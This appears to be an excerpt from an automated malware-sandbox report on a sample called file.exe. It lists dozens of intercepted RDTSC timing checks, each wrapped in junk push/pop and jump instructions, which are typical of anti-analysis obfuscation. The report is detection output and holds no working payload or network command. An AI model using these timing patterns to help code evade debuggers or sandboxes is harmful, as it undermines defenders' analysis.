Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E105 second address: D1E10A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E682 second address: D1E6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F7h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E6A1 second address: D1E6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2B4CC6E2A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1E83E second address: D1E866 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 jmp 00007F2B4D4AC9F5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F2B4D4AC9F2h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F066 second address: D1F078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a je 00007F2B4CC6E2A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F078 second address: D1F09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2B4D4AC9F8h 0x0000000b jnc 00007F2B4D4AC9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F09E second address: D1F0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D279AC second address: D279B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2AB50 second address: D2AB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2B4CC6E2B6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2AB6C second address: D2AB70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2AB70 second address: D2AB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A5E2 second address: D2A5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F2B4D4AC9E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A5F3 second address: D2A5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A88D second address: D2A89A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A89A second address: D2A8A8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A8A8 second address: D2A8AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33814 second address: D33826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F2B4CC6E2A6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33826 second address: D3382C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3382C second address: D3383A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3383A second address: D33840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6442 second address: CA6448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6448 second address: CA644C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA644C second address: CA6467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA6467 second address: CA647E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EDh 0x00000009 je 00007F2B4D4AC9E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA647E second address: CA6482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32357 second address: D32366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 js 00007F2B4D4AC9E8h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32627 second address: D3262E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3262E second address: D3263A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2B4D4AC9E6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3263A second address: D32666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2B4CC6E2AEh 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F2B4CC6E2A6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jnp 00007F2B4CC6E2C6h 0x0000001c js 00007F2B4CC6E2AAh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32666 second address: D3266A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32922 second address: D3292C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3292C second address: D32934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32934 second address: D32938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32BA0 second address: D32BB2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B4D4AC9EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32BB2 second address: D32BD2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2B4CC6E2AFh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32BD2 second address: D32BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D32BD6 second address: D32BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36A73 second address: D36A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2B4D4AC9F1h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36FE0 second address: D36FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3727F second address: D37283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37283 second address: D3728D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B864 second address: D3B880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F7h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B880 second address: D3B886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B886 second address: D3B88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B88C second address: D3B890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43BB2 second address: D43BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F6h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43BCC second address: D43BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F2B4CC6E2A6h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43BDC second address: D43BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43E7A second address: D43E8A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2B4CC6E2A6h 0x00000008 je 00007F2B4CC6E2A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4442C second address: D44432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44432 second address: D44438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44438 second address: D44442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2B4D4AC9E6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4472A second address: D44746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F2B4CC6E2B2h 0x0000000f jc 00007F2B4CC6E2A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44746 second address: D44756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F2B4D4AC9F6h 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44756 second address: D4475C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44CD8 second address: D44CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jne 00007F2B4D4ACA04h 0x0000000d jmp 00007F2B4D4AC9F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2E0C second address: CA2E1B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2E1B second address: CA2E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CF44 second address: D4CF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4CC6E2ACh 0x00000009 jno 00007F2B4CC6E2A6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CF5A second address: D4CF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D209 second address: D4D20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D20F second address: D4D23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F0h 0x00000009 popad 0x0000000a jmp 00007F2B4D4AC9F6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D654 second address: D4D663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4CC6E2ABh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D7F7 second address: D4D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4D801 second address: D4D827 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2B4CC6E2A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jl 00007F2B4CC6E2A6h 0x00000016 pop edi 0x00000017 jmp 00007F2B4CC6E2AFh 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56833 second address: D56851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2B4D4AC9E6h 0x0000000a jmp 00007F2B4D4AC9F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54996 second address: D549B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F2B4CC6E2B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D549B7 second address: D549D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2B4D4AC9F8h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54E73 second address: D54E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54FB1 second address: D54FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2B4D4AC9E6h 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54FBC second address: D54FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54FC6 second address: D54FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54FCC second address: D54FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5585A second address: D55873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55873 second address: D55883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2B4CC6E2A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55883 second address: D55887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55887 second address: D5588B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5588B second address: D558BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F2B4D4AC9E6h 0x00000013 jmp 00007F2B4D4AC9EDh 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D558BE second address: D558F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F2B4CC6E2B2h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D558F2 second address: D558F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D558F6 second address: D55902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55902 second address: D55908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55908 second address: D5590E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5590E second address: D55912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55FDC second address: D55FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D55FEB second address: D55FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56680 second address: D56684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56684 second address: D56688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56688 second address: D56697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F2B4CC6E2A6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56697 second address: D5669B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C9F1 second address: D5C9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C9F7 second address: D5CA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2B4D4AC9F7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CA16 second address: D5CA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6853A second address: D68544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2B4D4AC9E6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68544 second address: D68567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68567 second address: D6859B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F7h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2B4D4AC9F6h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6859B second address: D685C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B7h 0x00000007 jmp 00007F2B4CC6E2ABh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68284 second address: D68294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E4F4 second address: D6E4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E4FA second address: D6E4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E4FE second address: D6E504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E504 second address: D6E50E instructions: 0x00000000 rdtsc 0x00000002 js 00007F2B4D4AC9F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71EBF second address: D71EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F2B4CC6E2B3h 0x0000000d jmp 00007F2B4CC6E2B0h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F2B4CC6E2A6h 0x0000001a rdtsc
